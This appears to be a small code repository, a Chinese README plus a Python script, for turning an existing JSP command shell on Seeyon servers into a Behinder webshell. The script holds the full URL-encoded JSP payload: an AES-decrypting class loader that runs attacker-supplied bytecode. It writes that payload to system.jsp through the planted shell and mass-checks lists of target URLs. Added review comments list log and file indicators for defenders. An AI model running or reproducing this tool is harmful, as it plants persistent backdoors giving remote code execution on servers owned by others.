├── README.md
└── cmd2bx.py

/README.md:
--------------------------------------------------------------------------------
# cmd2bx
把jsp的cmdshell升级为冰蝎一句话

详情请戳:https://yzddmr6.tk/posts/cmd2bx/
--------------------------------------------------------------------------------
/cmd2bx.py:
--------------------------------------------------------------------------------
# NOTE(review): this listing was flattened onto two physical lines with gutter
# numbers; line breaks and indentation below are reconstructed, so the exact
# nesting of the statements in the __main__ block should be confirmed against
# the original file.
#
# What the script does, as visible in the code: it calls an already-present JSP
# command shell on a host and uses it to write a second JSP file, the stub the
# README refers to as 冰蝎 (Behinder).
#
# Defender notes (every value below is taken from this file):
#   * web-server access logs: GET requests to `/seeyon/test123456.jsp` whose
#     `cmd=` parameter carries a URL-encoded `cmd /c echo ... > ...system.jsp`;
#   * file system: a new `system.jsp` under `webapps\seeyon`;
#   * follow-up traffic: requests to `/seeyon/system.jsp`, including ones with
#     a `dnxs` parameter (the stub's key-exchange branch);
#   * JSP content: a page-local ClassLoader subclass calling `defineClass`,
#     `Cipher.getInstance("AES")` and `sun.misc.BASE64Decoder` in one page.
import requests
import os,time

'''
Code By yzddMr6
'''


# Fixed request headers: every request sent by this script carries this exact
# Chrome 69 User-Agent string.
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"
}

# Path and query prefix of the pre-existing command shell; the command to run
# is appended after `cmd=`.
cmdshell='/seeyon/test123456.jsp?pwd=aaa&cmd='# change this to your own address and password
# URL-encoded Windows command (`cmd /c echo <JSP source> > ..\webapps\seeyon\system.jsp`).
# `%5e` is `^`, used to escape `<` and `>` for cmd.exe. The JSP source it writes:
#   - when the `dnxs` request parameter is present, stores a 16-character key
#     derived from a random UUID in the session attribute "u" and prints it;
#   - otherwise AES-decrypts the Base64 request-body line with that session
#     key, defines a class from the resulting bytes and instantiates it.
url_payload='cmd%20/c+echo+%5e%3c%25%40page+import%3d%22java.util.*%2cjavax.crypto.*%2cjavax.crypto.spec.*%22%25%5e%3e%5e%3c%25!class+U+extends+ClassLoader%7bU(ClassLoader+c)%7bsuper(c)%3b%7dpublic+Class+g(byte+%5b%5db)%7breturn+super.defineClass(b%2c0%2cb.length)%3b%7d%7d%25%5e%3e%5e%3c%25if(request.getParameter(%22dnxs%22)!%3dnull)%7bString+k%3d(%22%22%2bUUID.randomUUID()).replace(%22-%22%2c%22%22).substring(16)%3bsession.putValue(%22u%22%2ck)%3bout.print(k)%3breturn%3b%7dCipher+c%3dCipher.getInstance(%22AES%22)%3bc.init(2%2cnew+SecretKeySpec((session.getValue(%22u%22)%2b%22%22).getBytes()%2c%22AES%22))%3bnew+U(this.getClass().getClassLoader()).g(c.doFinal(new+sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext)%3b%25%5e%3e+%3e+..%5cwebapps%5cseeyon%5csystem.jsp'
# Path at which the file written by `url_payload` is expected to be served.
bxshell='/seeyon/system.jsp'

def cmd2bx(url: str) -> int:
    """Send the write command through the command shell, then probe the new JSP.

    Args:
        url: Base URL of the host; ``cmdshell`` and ``bxshell`` are appended
            to it unchanged.

    Returns:
        1 if the follow-up GET to ``url + bxshell`` answered 200 or 500,
        otherwise 0.

    Side effects:
        Issues two HTTP GET requests, prints one result line, and on a
        positive result appends that line to ``savebx.txt`` in the current
        working directory.
    """
    # First request: response is discarded, only its side effect matters.
    requests.get(url=url+cmdshell+url_payload,headers=headers,timeout=10)
    url1=url+bxshell
    # Second request: plain GET with no parameters and no body.
    res=requests.get(url=url1,headers=headers)
    # NOTE(review): 500 is counted as a hit, presumably because the stub throws
    # when called without a session key and body -- confirm. A 200/500 here
    # only shows that something answers at this path, not that this run
    # created it.
    if res.status_code==200 or res.status_code==500:
        with open('savebx.txt','a') as save:
            save.write('BXSHELL [+] '+url1+'\n')
        print('BXSHELL [+] '+url1)
        return 1
    else:
        print('BXSHELL [-] '+url1)
        return 0


# Entry point: the prompt accepts either a single URL (anything containing
# "://") or the path of a text file with one base URL per line.
if __name__=='__main__':
    start_time = time.time()
    urllist = []
    url_file_name = input('file or url :')
    # The whole run sits inside one try block, so the first exception raised by
    # cmd2bx (e.g. a connection error) ends processing of the remaining URLs.
    try:
        if '://' in url_file_name:
            cmd2bx(url_file_name.strip())
        else:
            if os.path.exists(url_file_name):
                print(url_file_name, 'exists!')
                with open(url_file_name, 'r') as url_file:
                    for url in url_file.readlines():
                        url = url.strip()
                        urllist.append(url)
                for u in urllist:
                    # The return value is stored but never read.
                    result=cmd2bx(u)
                print("scanned down with %.2f\n" % float(time.time() - start_time))
            else:
                print(url_file_name + " not exist!")
                # exit() raises SystemExit, which `except Exception` does not catch.
                exit(0)
    except Exception as e:
        # Prints the start timestamp (not the elapsed time) next to the error.
        print(start_time, e)
--------------------------------------------------------------------------------